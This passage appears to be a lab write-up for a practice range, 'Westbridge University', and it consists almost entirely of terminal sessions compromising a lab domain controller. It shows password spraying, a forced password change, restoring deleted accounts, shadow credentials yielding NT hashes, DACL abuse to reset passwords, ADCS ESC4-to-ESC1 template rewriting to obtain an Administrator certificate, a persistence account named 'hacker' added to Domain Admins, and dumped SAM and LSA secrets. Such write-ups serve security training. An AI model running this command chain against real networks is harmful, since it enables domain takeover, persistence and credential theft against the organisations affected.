13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc smb 10.0.10.5 -u users.txt -p 'Welcome2Westbridge!' --continue-on-success --smb-timeout 15
SMB 10.0.10.5 445 DC [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC) (domain:westbridge.hsm) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.10.5 445 DC [-] westbridge.hsm\Administrator:Welcome2Westbridge! STATUS_ACCOUNT_RESTRICTION
SMB 10.0.10.5 445 DC [-] westbridge.hsm\a.owen:Welcome2Westbridge! STATUS_LOGON_FAILURE
SMB 10.0.10.5 445 DC [-] westbridge.hsm\a.pherson:Welcome2Westbridge! STATUS_PASSWORD_MUST_CHANGE
SMB 10.0.10.5 445 DC [-] westbridge.hsm\a.price:Welcome2Westbridge! STATUS_LOGON_FAILURE
SMB 10.0.10.5 445 DC [-] westbridge.hsm\b.jones:Welcome2Westbridge! STATUS_LOGON_FAILURE
^c
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-changepasswd 'westbridge.hsm/a.pherson:Welcome2Westbridge!@DC.westbridge.hsm' -newpass 'Pass123456' -p kpasswd -dc-ip 10.0.10.5
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of westbridge.hsm\a.pherson
[*] Password was changed successfully.
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc smb 10.0.10.5 -u a.pherson -p Pass123456
SMB 10.0.10.5 445 DC [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC) (domain:westbridge.hsm) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.10.5 445 DC [+] westbridge.hsm\a.pherson:Pass123456
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

Using the recovered password, we checked the user’s AD permissions and found CREATE_CHILD, WRITE_OWNER, and WRITE_DACL permissions on the Deleted Objects container.

We restored the deleted accounts j.dillon, t.dixon, and a.collins. After restoration, we added Shadow Credentials to the accounts, obtained their authentication material (.ccache and .pfx), and extracted their NT hashes.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u a.pherson -k get writable
distinguishedName: CN=Users,DC=westbridge,DC=hsm
permission: CREATE_CHILD; WRITE

distinguishedName: CN=Deleted Objects,DC=westbridge,DC=hsm
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=westbridge,DC=hsm
permission: WRITE

distinguishedName: CN=a.pherson,CN=Users,DC=westbridge,DC=hsm
permission: WRITE

distinguishedName: CN=j.dillon\0ADEL:d6178188-a0f8-4d9f-868f-20124885e4cb,CN=Deleted Objects,DC=westbridge,DC=hsm
permission: WRITE

distinguishedName: CN=t.dixon\0ADEL:28a4ef10-bfa7-4c4a-a498-c803cca04cb7,CN=Deleted Objects,DC=westbridge,DC=hsm
permission: WRITE

distinguishedName: CN=a.collins\0ADEL:3c321a1e-1ef3-4619-a10b-e25882fc48c7,CN=Deleted Objects,DC=westbridge,DC=hsm
permission: WRITE

distinguishedName: DC=westbridge.hsm,CN=MicrosoftDNS,DC=DomainDnsZones,DC=westbridge,DC=hsm
permission: CREATE_CHILD

distinguishedName: DC=_msdcs.westbridge.hsm,CN=MicrosoftDNS,DC=ForestDnsZones,DC=westbridge,DC=hsm
permission: CREATE_CHILD

distinguishedName: DC=westbridge-research.hsm,CN=MicrosoftDNS,DC=ForestDnsZones,DC=westbridge,DC=hsm
permission: CREATE_CHILD

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u a.pherson -k set restore j.dillon
[+] j.dillon has been restored successfully under CN=j.dillon,CN=Users,DC=westbridge,DC=hsm

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u a.pherson -k set restore t.dixon
[+] t.dixon has been restored successfully under CN=t.dixon,CN=Users,DC=westbridge,DC=hsm

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u a.pherson -k set restore a.collins
[+] a.collins has been restored successfully under CN=a.collins,CN=Users,DC=westbridge,DC=hsm

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u a.pherson -k add shadowCredentials t.dixon 2>/dev/null
[+] KeyCredential generated with following sha256 of RSA key: a411796eb8c279a1d0c2798b1c4678a8ef8bb47f8e24f323e55f2e13d146a063
[-] PKINIT failed on DC 10.0.10.5, you must find a Kerberos server with a certification authority!
[-] Retry on a working KDC and do:
badNTPKInit 'kerberos+pfx://westbridge.hsm\t.dixon@10.0.10.5/?certdata=t.dixon_eQ.pfx&timeout=350'
[+] PKINIT PFX certificate saved at: t.dixon_eQ.pfx
[+] TGT stored in ccache file t.dixon_eQ.ccache

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u a.pherson -k add shadowCredentials j.dillon 2>/dev/null
[+] KeyCredential generated with following sha256 of RSA key: d813a19aa494b6574e678e801edaf618b34e25eda5ece05ce890eb50cc99cbce
[-] PKINIT failed on DC 10.0.10.5, you must find a Kerberos server with a certification authority!
[-] Retry on a working KDC and do:
badNTPKInit 'kerberos+pfx://westbridge.hsm\j.dillon@10.0.10.5/?certdata=j.dillon_Bi.pfx&timeout=350'
[+] PKINIT PFX certificate saved at: j.dillon_Bi.pfx
[+] TGT stored in ccache file j.dillon_Bi.ccache


┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u a.pherson -k add shadowCredentials a.collins 2>/dev/null
[+] KeyCredential generated with following sha256 of RSA key: 13e20347d3ef997512dcae57b95ba92fa4b4bdc15036f4cdef405615ea906219
[-] PKINIT failed on DC 10.0.10.5, you must find a Kerberos server with a certification authority!
[-] Retry on a working KDC and do:
badNTPKInit 'kerberos+pfx://westbridge.hsm\a.collins@10.0.10.5/?certdata=a.collins_ZM.pfx&timeout=350'
[+] PKINIT PFX certificate saved at: a.collins_ZM.pfx
[+] TGT stored in ccache file a.collins_ZM.ccache

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ certipy-ad auth -pfx j.dillon_Bi.pfx -dc-ip 10.0.10.5 -domain westbridge.hsm -username j.dillon
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*] SAN DNS Host Name: 'j.dillon'
[!] The provided username does not match the identity found in the certificate: 'j.dillon' - 'j$'
Do you want to continue? (Y/n): Y
[!] The provided domain does not match the identity found in the certificate: 'westbridge.hsm' - 'dillon'
Do you want to continue? (Y/n): Y
[*] Using principal: 'j.dillon@westbridge.hsm'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'j.dillon.ccache'
[*] Wrote credential cache to 'j.dillon.ccache'
[*] Trying to retrieve NT hash for 'j.dillon'
[*] Got hash for 'j.dillon@westbridge.hsm': aad3b435b51404eeaad3b435b51404ee:8bd7ff5bf2b9c1163454377575887b1d

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ certipy-ad auth -pfx t.dixon_eQ.pfx -dc-ip 10.0.10.5 -domain westbridge.hsm -username t.dixon
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*] SAN DNS Host Name: 't.dixon'
[!] The provided username does not match the identity found in the certificate: 't.dixon' - 't$'
Do you want to continue? (Y/n): Y
[!] The provided domain does not match the identity found in the certificate: 'westbridge.hsm' - 'dixon'
Do you want to continue? (Y/n): Y
[*] Using principal: 't.dixon@westbridge.hsm'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 't.dixon.ccache'
[*] Wrote credential cache to 't.dixon.ccache'
[*] Trying to retrieve NT hash for 't.dixon'
[*] Got hash for 't.dixon@westbridge.hsm': aad3b435b51404eeaad3b435b51404ee:e02831e354d2c331b3760d947a11431d

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ certipy-ad auth -pfx a.collins_ZM.pfx -dc-ip 10.0.10.5 -domain westbridge.hsm -username a.collins
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*] SAN DNS Host Name: 'a.collins'
[!] The provided username does not match the identity found in the certificate: 'a.collins' - 'a$'
Do you want to continue? (Y/n): Y
[!] The provided domain does not match the identity found in the certificate: 'westbridge.hsm' - 'collins'
Do you want to continue? (Y/n): Y
[*] Using principal: 'a.collins@westbridge.hsm'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'a.collins.ccache'
[*] Wrote credential cache to 'a.collins.ccache'
[*] Trying to retrieve NT hash for 'a.collins'
[*] Got hash for 'a.collins@westbridge.hsm': aad3b435b51404eeaad3b435b51404ee:071d882abec2baeb6d589da7cc799503

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc ldap 10.0.10.5 -u t.dixon -H e02831e354d2c331b3760d947a11431d
LDAP 10.0.10.5 389 DC [*] Windows 11 / Server 2025 Build 26100 (name:DC) (domain:westbridge.hsm) (signing:None) (channel binding:When Supported)
LDAP 10.0.10.5 389 DC [+] westbridge.hsm\t.dixon:e02831e354d2c331b3760d947a11431d

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc ldap 10.0.10.5 -u j.dillon -H 8bd7ff5bf2b9c1163454377575887b1d
LDAP 10.0.10.5 389 DC [*] Windows 11 / Server 2025 Build 26100 (name:DC) (domain:westbridge.hsm) (signing:None) (channel binding:When Supported)
LDAP 10.0.10.5 389 DC [+] westbridge.hsm\j.dillon:8bd7ff5bf2b9c1163454377575887b1d

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc ldap 10.0.10.5 -u a.collins -H 071d882abec2baeb6d589da7cc799503
LDAP 10.0.10.5 389 DC [*] Windows 11 / Server 2025 Build 26100 (name:DC) (domain:westbridge.hsm) (signing:None) (channel binding:When Supported)
LDAP 10.0.10.5 389 DC [+] westbridge.hsm\a.collins:071d882abec2baeb6d589da7cc799503

Restoring j.dillon, t.dixon, a.collins and walking their rights leads through OU=IT Tier3 (j.dillon has DACL WRITE) to reset A.OWEN, b.jones, d.hoff:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u j.dillon -p :8bd7ff5bf2b9c1163454377575887b1d get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=westbridge,DC=hsm
permission: WRITE

distinguishedName: OU=IT Tier3,DC=westbridge,DC=hsm
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE

distinguishedName: CN=j.dillon,CN=Users,DC=westbridge,DC=hsm
permission: WRITE

distinguishedName: DC=westbridge.hsm,CN=MicrosoftDNS,DC=DomainDnsZones,DC=westbridge,DC=hsm
permission: CREATE_CHILD

distinguishedName: DC=_msdcs.westbridge.hsm,CN=MicrosoftDNS,DC=ForestDnsZones,DC=westbridge,DC=hsm
permission: CREATE_CHILD

distinguishedName: DC=westbridge-research.hsm,CN=MicrosoftDNS,DC=ForestDnsZones,DC=westbridge,DC=hsm
permission: CREATE_CHILD

With j.dillon‘s WRITE_DACL permission over the IT Tier 3 OU, we granted j.dillon GenericAll over the OU.

1
2
3
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u j.dillon -p :8bd7ff5bf2b9c1163454377575887b1d add genericAll "OU=IT Tier3,DC=westbridge,DC=hsm" j.dillon
[+] j.dillon has now GenericAll on OU=IT Tier3,DC=westbridge,DC=hsm

The IT Tier 3 OU contained A.OWEN, b.jones, and d.hoff, whose passwords were then changed using the newly obtained privileges.

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u j.dillon -p :8bd7ff5bf2b9c1163454377575887b1d set password A.OWEN Pass123456
[+] Password changed successfully!

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u j.dillon -p :8bd7ff5bf2b9c1163454377575887b1d set password b.jones Pass123456
[+] Password changed successfully!

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u j.dillon -p :8bd7ff5bf2b9c1163454377575887b1d set password d.hoff Pass123456
[+] Password changed successfully!

The new credentials were verified successfully over LDAP, confirming control over all three accounts.

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc ldap 10.0.10.5 -u A.OWEN b.jones d.hoff -p Pass123456 --continue-on-success
LDAP 10.0.10.5 389 DC [*] Windows 11 / Server 2025 Build 26100 (name:DC) (domain:westbridge.hsm) (signing:None) (channel binding:When Supported)
LDAP 10.0.10.5 389 DC [+] westbridge.hsm\A.OWEN:Pass123456
LDAP 10.0.10.5 389 DC [+] westbridge.hsm\b.jones:Pass123456
LDAP 10.0.10.5 389 DC [+] westbridge.hsm\d.hoff:Pass123456
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

ADCS: ESC4 → ESC1 → Domain Admin

A.OWEN is a member of CA-Manager (BloodHound-confirmed), which has dangerous ACL rights over the SmartCardAuthentication template - ESC4. We rewrite the template into an ESC1 configuration, then request a cert as the Administrator SID:

BloodHound - A.OWEN → MemberOf → CA-Manager, and the ADCS ESC4→ESC1 route that yields Domain Admin over the DC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ certipy-ad find -u 'A.OWEN@westbridge.hsm' -p 'Pass123456' -dc-ip 10.0.10.5 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 17 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'CA01-AD-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'CA01-AD-CA'
[*] Checking web enrollment for CA 'CA01-AD-CA' @ 'DC.westbridge.hsm'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : CA01-AD-CA
DNS Name : DC.westbridge.hsm
Certificate Subject : CN=CA01-AD-CA, DC=westbridge, DC=hsm
Certificate Serial Number : 39172D2A809750914E56DBC4A1C2598F
Certificate Validity Start : 2026-07-04 17:03:23+00:00
Certificate Validity End : 2031-07-04 17:13:23+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : WESTBRIDGE.HSM\Administrators
Access Rights
ManageCa : WESTBRIDGE.HSM\Administrators
WESTBRIDGE.HSM\Domain Admins
WESTBRIDGE.HSM\Enterprise Admins
ManageCertificates : WESTBRIDGE.HSM\Administrators
WESTBRIDGE.HSM\Domain Admins
WESTBRIDGE.HSM\Enterprise Admins
Enroll : WESTBRIDGE.HSM\Authenticated Users
Certificate Templates
0
Template Name : SmartCardAuthentication
Display Name : Smart Card Authentication
Certificate Authorities : CA01-AD-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Enrollment Flag : AutoEnrollment
Extended Key Usage : Smart Card Logon
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2026-07-04T18:01:18+00:00
Template Last Modified : 2026-07-04T20:48:39+00:00
Permissions
Enrollment Permissions
Enrollment Rights : WESTBRIDGE.HSM\Domain Admins
WESTBRIDGE.HSM\Enterprise Admins
Object Control Permissions
Owner : WESTBRIDGE.HSM\Administrator
Full Control Principals : WESTBRIDGE.HSM\Domain Admins
WESTBRIDGE.HSM\Enterprise Admins
Write Owner Principals : WESTBRIDGE.HSM\Domain Admins
WESTBRIDGE.HSM\Enterprise Admins
Write Dacl Principals : WESTBRIDGE.HSM\Domain Admins
WESTBRIDGE.HSM\Enterprise Admins
Write Property Enroll : WESTBRIDGE.HSM\Domain Admins
WESTBRIDGE.HSM\Enterprise Admins
[+] User ACL Principals : WESTBRIDGE.HSM\CA-Manager
[!] Vulnerabilities
ESC4 : User has dangerous permissions.

Overwrote the certificate template configuration to make it vulnerable to ESC1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ certipy-ad template -u A.OWEN@westbridge.hsm -p 'Pass123456' -template SmartCardAuthentication -dc-ip 10.0.10.5 -write-default-configuration
[*] Successfully updated 'SmartCardAuthentication'
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ certipy-ad find -u 'A.OWEN@westbridge.hsm' -p 'Pass123456' -dc-ip 10.0.10.5 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 17 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'CA01-AD-CA' via RRP
[*] Successfully retrieved CA configuration for 'CA01-AD-CA'
[*] Checking web enrollment for CA 'CA01-AD-CA' @ 'DC.westbridge.hsm'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : CA01-AD-CA
DNS Name : DC.westbridge.hsm
Certificate Subject : CN=CA01-AD-CA, DC=westbridge, DC=hsm
Certificate Serial Number : 39172D2A809750914E56DBC4A1C2598F
Certificate Validity Start : 2026-07-04 17:03:23+00:00
Certificate Validity End : 2031-07-04 17:13:23+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : WESTBRIDGE.HSM\Administrators
Access Rights
ManageCa : WESTBRIDGE.HSM\Administrators
WESTBRIDGE.HSM\Domain Admins
WESTBRIDGE.HSM\Enterprise Admins
ManageCertificates : WESTBRIDGE.HSM\Administrators
WESTBRIDGE.HSM\Domain Admins
WESTBRIDGE.HSM\Enterprise Admins
Enroll : WESTBRIDGE.HSM\Authenticated Users
Certificate Templates
0
Template Name : SmartCardAuthentication
Display Name : Smart Card Authentication
Certificate Authorities : CA01-AD-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2026-07-04T18:01:18+00:00
Template Last Modified : 2026-08-25T07:54:22+00:00
Permissions
Object Control Permissions
Owner : WESTBRIDGE.HSM\Administrator
Full Control Principals : WESTBRIDGE.HSM\Authenticated Users
Write Owner Principals : WESTBRIDGE.HSM\Authenticated Users
Write Dacl Principals : WESTBRIDGE.HSM\Authenticated Users
[+] User Enrollable Principals : WESTBRIDGE.HSM\Authenticated Users
[+] User ACL Principals : WESTBRIDGE.HSM\Authenticated Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
ESC4 : User has dangerous permissions.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ certipy-ad req -u 'A.OWEN@westbridge.hsm' -p 'Pass123456' -ca 'CA01-AD-CA' -template SmartCardAuthentication -dc-ip 10.0.10.5
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 11
[*] Successfully requested certificate
[*] Got certificate with UPN 'a.owen@westbridge.hsm'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'a.owen.pfx'
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ certipy-ad req -u 'a.owen@westbridge.hsm' -p 'Pass123456' -dc-ip 10.0.10.5 -target DC.westbridge.hsm -ca CA01-AD-CA -template SmartCardAuthentication -upn administrator@westbridge.hsm -sid S-1-5-21-1978613116-3728955385-531918137-500
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@westbridge.hsm'
[*] Certificate object SID is 'S-1-5-21-1978613116-3728955385-531918137-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.0.10.5
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*] SAN UPN: 'administrator@westbridge.hsm'
[*] SAN URL SID: 'S-1-5-21-1978613116-3728955385-531918137-500'
[*] Security Extension SID: 'S-1-5-21-1978613116-3728955385-531918137-500'
[*] Using principal: 'administrator@westbridge.hsm'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@westbridge.hsm': aad3b435b51404eeaad3b435b51404ee:23f398d3fa12625184ab8a2c19cdd96b

Obtained the Administrator NTLM hash from the Domain Controller and authenticated to the SMB share. From the Administrator’s desktop, we retrieved the flag, along with an .eml file containing the password for a KeePass .kdb file and the corresponding database file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ export KRB5CCNAME=./administrator.ccache ; impacket-smbclient -k -no-pass DC.westbridge.hsm
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use C$
# cd users
# cd Administrator
# cd Desktop
# ls
drw-rw-rw- 0 Wed Jul 29 16:41:00 2026 .
drw-rw-rw- 0 Thu Jul 23 16:28:05 2026 ..
-rw-rw-rw- 4828 Wed Jul 29 16:40:07 2026 Database.kdb
-rw-rw-rw- 282 Fri Jul 3 08:22:17 2026 desktop.ini
-rw-rw-rw- 31 Wed Jul 15 12:34:14 2026 flag.txt
-rw-rw-rw- 1176 Wed Jul 29 16:37:56 2026 Forest_Trust_Validation.eml
# get flag.txt
# get Database.kdb
# get Forest_Trust_Validation.eml
# exit

Using the Administrator Kerberos cache, we created a new user named hacker, added it to the administrators group, and dumped password hashes from the compromised system.

1
2
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ export KRB5CCNAME=$PWD/administrator.ccache

After obtaining Administrator privileges, we created a user named hacker on the Domain Controller as a persistence mechanism and enabled RDP access for the account.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u Administrator -k -s add user hacker 'Pass123456'
[+] hacker created
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD -i 10.0.10.5 --host DC.westbridge.hsm -d westbridge.hsm -u Administrator -k -s add groupMember 'Domain Admins' hacker
[+] hacker added to Domain Admins
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc smb 10.0.10.5 -u hacker -p Pass123456 --smb-timeout 10
SMB 10.0.10.5 445 DC [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC) (domain:westbridge.hsm) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.10.5 445 DC [+] westbridge.hsm\hacker:Pass123456 (Pwn3d!)
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc smb 10.0.10.5 -u hacker -p Pass123456 --smb-timeout 10 --sam --lsa
SMB 10.0.10.5 445 DC [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC) (domain:westbridge.hsm) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.10.5 445 DC [+] westbridge.hsm\hacker:Pass123456 (Pwn3d!)
SMB 10.0.10.5 445 DC [*] Dumping SAM hashes
SMB 10.0.10.5 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:3b23abd84d0faf167babb7d23f8aa758:::
SMB 10.0.10.5 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.0.10.5 445 DC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[04:38:18] ERROR SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.regsecrets.py:436
SMB 10.0.10.5 445 DC [+] Added 3 SAM hashes to the database
SMB 10.0.10.5 445 DC [*] Dumping LSA secrets
SMB 10.0.10.5 445 DC WESTBRIDGE\DC$:aes256-cts-hmac-sha1-96:b532ab279a7817ce5bb0f022e7e62e1a4c60103c5cb0c30c286b29b1279f042d
SMB 10.0.10.5 445 DC WESTBRIDGE\DC$:aes128-cts-hmac-sha1-96:1c635905b714340be734db0fbbc02191
SMB 10.0.10.5 445 DC WESTBRIDGE\DC$:des-cbc-md5:1a57f83b4ad5083e
SMB 10.0.10.5 445 DC WESTBRIDGE\DC$:plain_password_hex:b1bde69ac031185faf58eb9da02ce9e861c17d0f4e0a926640d44a339ee05675fb72ccb6f5438431a66a6542388f4b1b3c31cd1066352b1790ef2f8320627197dccfb3d814611971403faaf48dc3456637858fbd95c238e407b5cdb3006b22fc8bf6088c610829722af503c26533b44eab197565b8dd9ae959c175da83f06aa85a69d2bed6ff02c06830407a6a456f458dfc5a4cfe5172c6da53755bfa8b496a4e29a2dbcd0aaec91e8fc6d6089300918e151ca64722d7a447f52cdf35e28f19332fed24616a9cc444f05628d527d2d4763413a0ce7afe7bac1e6c403efa691510a339887cda50a3aecc487e19052971
SMB 10.0.10.5 445 DC WESTBRIDGE\DC$:aad3b435b51404eeaad3b435b51404ee:e841cefed4552f68d7a4458e57136386:::
SMB 10.0.10.5 445 DC dpapi_machinekey:0xdbf4b39aa128cec2e07e9fa8af66d098fcf7d08b
